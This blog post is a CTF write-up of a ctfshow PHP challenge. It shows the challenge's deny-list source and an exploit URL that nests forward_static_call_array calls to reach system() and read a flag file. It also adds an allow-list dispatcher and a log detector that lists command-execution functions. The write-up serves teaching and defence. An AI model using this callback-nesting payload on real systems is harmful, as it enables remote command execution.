M0deration's blog.

ctfshow red packet challenge

Word count: 313 · Reading time: 1 min
2020/12/01

Take care of yourself (耗子尾汁)

This evening a junior schoolmate sent me a challenge, saying he'd been trying for ages and it just wouldn't work.

Source

<?php
error_reporting(0);
highlight_file(__FILE__);
$a = $_GET['a'];
$b = $_GET['b'];
function CTFSHOW_36_D($a,$b){
    $dis = array("var_dump","exec","readfile","highlight_file","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents","");
    $a = strtolower($a);
    if (!in_array($a,$dis,true)) {
        forward_static_call_array($a,$b);
    }else{
        echo 'hacker';
    }
}
CTFSHOW_36_D($a,$b);
echo "rlezphp!!!";

forward_static_call_array is itself a callback invoker: it takes a function name and an argument array and calls that function. It is what gets executed here, and it is not on the deny list, so the obvious move is nesting (套娃, "matryoshka"). Nothing passed through b is filtered at all, so set a=forward_static_call_array and let b carry the arguments for an inner forward_static_call_array call, which in turn receives the real function name and its arguments.
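The root cause is that the challenge filters by deny list, so any function that can invoke another function (forward_static_call_array, and similar invokers it forgot) re-enters the dispatcher unchecked. The following hardened dispatcher is an added example written for this writeup, not code from the challenge or from ctfshow: it replaces the deny list with an explicit allow-list and refuses non-scalar arguments, so a nested callback array can never reach the call. The function name safe_dispatch and the allow-list contents are assumptions chosen for illustration.

```php
<?php
// Added example (not part of the original writeup or the challenge source):
// an allow-list dispatcher that closes the nested-callback hole.
//
// Two changes versus the challenge code:
//   1. Only names on an explicit allow-list are callable. A deny list can
//      never be complete (the challenge missed forward_static_call_array
//      and misspelled register_shutdown_function), an allow-list can.
//   2. Arguments must be scalars. Callback invokers need an array argument
//      (callable + argument list) to nest, so rejecting arrays breaks the
//      chain even if an invoker ever slipped onto the allow-list.
//
// safe_dispatch and the allow-list contents are assumptions for this demo.

function safe_dispatch(string $name, array $args)
{
    // Assumed allow-list: plain string helpers with no side effects.
    $allowed = ['strtoupper', 'strtolower', 'strrev', 'strlen', 'str_repeat'];

    $name = strtolower($name);
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("function not allowed: $name");
    }

    // Defence in depth: no arrays, objects or closures as arguments.
    foreach ($args as $i => $arg) {
        if (!is_scalar($arg)) {
            throw new InvalidArgumentException("argument $i is not a scalar");
        }
    }

    return $name(...$args);
}

// Constructed inputs for the demo.
// A legitimate call goes through:
var_dump(safe_dispatch('strrev', ['ctfshow']));

// The nested payload from the writeup (a=forward_static_call_array,
// b=[ 'system', ['whoami'] ]) is rejected at the allow-list check:
try {
    safe_dispatch('forward_static_call_array', [['system', ['whoami']]]);
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}

// Even an allowed function cannot be fed an array that could be a callback:
try {
    safe_dispatch('strrev', [['system', ['whoami']]]);
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
```

The allow-list is the real fix; the scalar check only exists so that adding a callback-style function to the list by mistake does not silently reopen the nesting path.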

PoC tested locally

<?php
$c = array("whoami");           // arguments for the innermost call
$a = array('system', $c);       // inner callback plus its arguments
var_dump($a);
//$b = array($a);
//var_dump($b);
// The outer call receives the inner function name and its argument array.
// The function name must be a quoted string: a bare constant name only
// warns on PHP 7 and is a fatal Error on PHP 8.
forward_static_call_array('forward_static_call_array', $a);

Exploit

?a=forward_static_call_array&b[]=system&b[][]=cat flag.php|base64
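From the defender's side, this payload shape is easy to spot in access logs: a function-name parameter that names a callback invoker, and a nested array parameter whose leaves name command-execution functions. The detector below is an added example written for this writeup, not part of the original post or of ctfshow; it runs over two constructed log lines, one benign and one carrying the exploit above. flag_nested_callback, the invoker and command-execution name lists, and the log lines are all assumptions for illustration.

```php
<?php
// Added example (not from the original writeup): flag query strings whose
// parameters name callback invokers or command-execution functions, at any
// nesting depth. Names, lists and sample log lines are constructed for this demo.

function flag_nested_callback(string $query): array
{
    // Functions that call another function named by their arguments
    // (the building blocks of the nesting trick). Assumed list, not exhaustive.
    $invokers = [
        'forward_static_call_array', 'forward_static_call',
        'call_user_func_array', 'call_user_func',
        'array_map', 'array_filter', 'array_walk', 'usort', 'uasort', 'uksort',
    ];
    // Functions that run OS commands or evaluate code. Assumed list.
    $dangerous = ['system', 'exec', 'shell_exec', 'passthru', 'popen',
                  'proc_open', 'pcntl_exec', 'eval', 'assert'];

    parse_str($query, $params);   // decodes b[]=x&b[][]=y into nested arrays
    $findings = [];

    // Recursive walk over the decoded parameters; $path records where we are.
    $walk = function ($value, string $path) use (&$walk, &$findings, $invokers, $dangerous) {
        if (is_array($value)) {
            foreach ($value as $k => $v) {
                $walk($v, $path . '[' . $k . ']');
            }
            return;
        }
        $lower = strtolower((string) $value);
        if (in_array($lower, $invokers, true)) {
            $findings[] = "$path names callback invoker '$lower'";
        } elseif (in_array($lower, $dangerous, true)) {
            $findings[] = "$path names command-execution function '$lower'";
        }
    };

    foreach ($params as $k => $v) {
        $walk($v, (string) $k);
    }
    return $findings;
}

// Constructed sample log lines (combined-log style, not real traffic).
$sample_log = [
    '10.0.0.5 - - [01/Dec/2020:21:03:11 +0800] "GET /index.php?a=strrev&b[]=ctfshow HTTP/1.1" 200 312',
    '10.0.0.9 - - [01/Dec/2020:21:04:02 +0800] "GET /index.php?a=forward_static_call_array&b[]=system&b[][]=cat+flag.php|base64 HTTP/1.1" 200 1090',
];

foreach ($sample_log as $line) {
    // Pull the query string out of the request line.
    if (!preg_match('/"GET \S+\?(\S*) HTTP/', $line, $m)) {
        continue;
    }
    $hits = flag_nested_callback($m[1]);
    if ($hits === []) {
        echo "clean:   ", $m[1], PHP_EOL;
    } else {
        echo "suspect: ", $m[1], PHP_EOL;
        foreach ($hits as $h) {
            echo "         - ", $h, PHP_EOL;
        }
    }
}
```

Matching on decoded parameter values rather than on the raw URL is what makes the nesting visible: after parse_str the second line yields a=forward_static_call_array, b[0]=system and b[1][0]=cat flag.php|base64, so both the invoker and the command-execution name are flagged with their exact positions.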

[screenshot omitted: 204853-445105]

base64-decode the output and you have the flag.
